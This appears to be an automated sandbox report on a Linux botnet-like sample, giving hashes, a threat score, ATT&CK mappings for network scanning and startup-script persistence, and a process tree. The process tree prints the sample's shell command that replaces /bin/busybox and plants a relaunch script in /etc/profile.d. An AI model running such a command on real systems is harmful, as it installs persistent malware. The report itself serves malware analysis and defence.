a7602ada97d833efbf2584af322ddd416e6dabcb1dbbfa38d86a6c96b6091898

Analysis

max time kernel
0s
max time network
154s
platform
linux_amd64
resource
ubuntu1804-amd64-en-20211208
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
26-03-2023 08:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

x86
Size

54KB
MD5

7c7be4c13eedd4687790c1ba127a6937
SHA1

8d1bed50c0f10f9380e955565e15e0d3cfc04132
SHA256

a7602ada97d833efbf2584af322ddd416e6dabcb1dbbfa38d86a6c96b6091898
SHA512

70a361a409debbc675c217d5be633aacbe7afd186b1962914e8e52e4aafac4ef1c2c5885bf6fe112371e38d6f9c47d7b8b96bbc8edc7354b72ad6ffbb4bb1bc2
SSDEEP

1536:S4Ew3tx+F9inCrb3bPUt0gIPSjKA18dIMGZirAMw:HEw3tx+FMnoLct0guSJmtGZTX

Score

9^/10

discovery persistence

Malware Config

Signatures

Contacts a large (37365) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Scanning
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Scanning
T1046
Modifies Bash startup script 1 TTPs 1 IoCs
persistence

Boot or Logon Autostart Execution
T1547

Processes:

sh

description ioc process

/etc/profile.d/log.sh /etc/profile.d/log.sh sh
Reads runtime system information 1 IoCs
Reads data from /proc virtual filesystem.

Processes:

mv

description ioc process

/proc/filesystems /proc/filesystems mv

description	ioc	process
/etc/profile.d/log.sh	/etc/profile.d/log.sh	sh

description	ioc	process
/proc/filesystems	/proc/filesystems	mv

/tmp/x86
/tmp/x86
1⤵
PID:571

/bin/sh
sh -c "mv -f /tmp/x86 /bin/busybox; chmod 777 /bin/busybox;echo -e 'pkill -9 busybox pkill -9 watchdog pkill -9 systemd /bin/busybox >/dev/null 2>&1 /bin/watchdog >/dev/null 2>&1 /bin/systemd >/dev/null 2>&1' > /etc/profile.d/log.sh;chmod 777 /etc/profile.d/log.sh"
1⤵
- Modifies Bash startup script
PID:572

/bin/mv
mv -f /tmp/x86 /bin/busybox
2⤵
- Reads runtime system information
PID:573

/bin/chmod
chmod 777 /bin/busybox
2⤵
PID:574

/bin/chmod
chmod 777 /etc/profile.d/log.sh
2⤵
PID:575

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Defense Evasion

Credential Access

Discovery

Network Service Scanning

T1046

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads